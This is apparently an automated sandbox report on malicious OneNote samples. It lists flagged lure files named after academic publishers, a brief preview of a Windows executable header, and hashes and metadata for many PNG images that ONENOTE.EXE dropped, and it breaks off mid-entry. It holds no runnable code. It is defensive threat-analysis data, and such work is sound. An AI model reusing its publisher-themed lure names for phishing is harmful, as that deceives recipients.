                                                                                                                                                                                                          • Filename: Insight_Medical_Publishing_4.one, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: OMICS_Online_1.one, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: Insight_Medical_Publishing.one, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: Omics_Journal.one, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: OMICS.one, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: OPAST_GROUP_1.one, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: OPAST_GROUP_LLC.one, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: OPAST_GROUP.one, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: Opast_International.one, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: opastonline.com.one, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: Opast_Publishing_Group_1.one, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: Opast_Publishing_Group.one, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: omicsonline.net.one, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: report_03_16_2023.one, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: 2023-03-16_0923.one, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: report_03_16_2023.one, Detection: malicious, Browse
                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L`.=...n...n...nCy.o...nCy.o...nCy.o...n.z.o(..n.z.o...n.z.o...nCy.o...n...nq..n.z.o...n.z.o...n.zsn...n...n...n.z.o...nRich...n................PE..d....6.d.........." ...!.F...................................................0............ .............................................T...d...d....`..(....0............... ..........8...........................p...@............`..`............................text....D.......F.................. ..`.rdata.......`.......J..............@..@.data...............................@....pdata.......0......................@..@_RDATA..\....P......................@..@.rsrc...(....`......................@..@.reloc....... ......................@..B........................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4181
                                                                                                                                                                                                          Entropy (8bit):7.950380155401321
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                                                                                                                          MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                                                                                                                          SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                                                                                                                          SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                                                                                                                          SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11886
                                                                                                                                                                                                          Entropy (8bit):7.946442244439929
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                                                                                                                          MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                                                                                                                          SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                                                                                                                          SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                                                                                                                          SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):5386
                                                                                                                                                                                                          Entropy (8bit):7.943706538857394
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                                                                                          MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                                                                                          SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                                                                                          SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                                                                                          SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11449
                                                                                                                                                                                                          Entropy (8bit):7.91552812501629
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                                                                                                                          MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                                                                                                                          SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                                                                                                                          SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                                                                                                                          SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):5386
                                                                                                                                                                                                          Entropy (8bit):7.943706538857394
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                                                                                          MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                                                                                          SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                                                                                          SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                                                                                          SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2232
                                                                                                                                                                                                          Entropy (8bit):7.837610270261933
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                                                                                          MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                                                                                          SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                                                                                          SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                                                                                          SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13084
                                                                                                                                                                                                          Entropy (8bit):7.940058639272698
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                                                                                          MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                                                                                          SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                                                                                          SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                                                                                          SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4081
                                                                                                                                                                                                          Entropy (8bit):7.943373267196131
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                                                                                                                          MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                                                                                                                          SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                                                                                                                          SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                                                                                                                          SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2332
                                                                                                                                                                                                          Entropy (8bit):7.8822150338370776
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                                                                                                                          MD5:91CB7F1273AA003076401081B8A22237
                                                                                                                                                                                                          SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                                                                                                                          SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                                                                                                                          SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):22634
                                                                                                                                                                                                          Entropy (8bit):7.974332204835705
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                                                                                                                          MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                                                                                                                          SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                                                                                                                          SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                                                                                                                          SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):14553
                                                                                                                                                                                                          Entropy (8bit):7.951135681293377
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                                                                                                                          MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                                                                                                                          SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                                                                                                                          SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                                                                                                                          SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):7374
                                                                                                                                                                                                          Entropy (8bit):7.955141875077912
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                                                                                          MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                                                                                          SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                                                                                          SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                                                                                          SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1924
                                                                                                                                                                                                          Entropy (8bit):7.836744258175623
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                                                                                                                          MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                                                                                                                          SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                                                                                                                          SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                                                                                                                          SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4181
                                                                                                                                                                                                          Entropy (8bit):7.950380155401321
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                                                                                                                          MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                                                                                                                          SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                                                                                                                          SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                                                                                                                          SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13084
                                                                                                                                                                                                          Entropy (8bit):7.940058639272698
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                                                                                          MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                                                                                          SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                                                                                          SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                                                                                          SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4847
                                                                                                                                                                                                          Entropy (8bit):7.950192613458318
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                                                                                          MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                                                                                          SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                                                                                          SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                                                                                          SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11332
                                                                                                                                                                                                          Entropy (8bit):7.9324721568775285
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                                                                                                                          MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                                                                                                                          SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                                                                                                                          SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                                                                                                                          SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):14458
                                                                                                                                                                                                          Entropy (8bit):7.944094738048628
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                                                                                          MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                                                                                          SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                                                                                          SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                                                                                          SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):8184
                                                                                                                                                                                                          Entropy (8bit):7.807848176906598
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                                                                                                                          MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                                                                                                                          SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                                                                                                                          SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                                                                                                                          SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11886
                                                                                                                                                                                                          Entropy (8bit):7.946442244439929
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                                                                                                                          MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                                                                                                                          SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                                                                                                                          SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                                                                                                                          SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11449
                                                                                                                                                                                                          Entropy (8bit):7.91552812501629
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                                                                                                                          MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                                                                                                                          SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                                                                                                                          SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                                                                                                                          SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4181
                                                                                                                                                                                                          Entropy (8bit):7.943341403425058
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                                                                                                                          MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                                                                                                                          SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                                                                                                                          SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                                                                                                                          SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4847
                                                                                                                                                                                                          Entropy (8bit):7.950192613458318
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                                                                                          MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                                                                                          SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                                                                                          SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
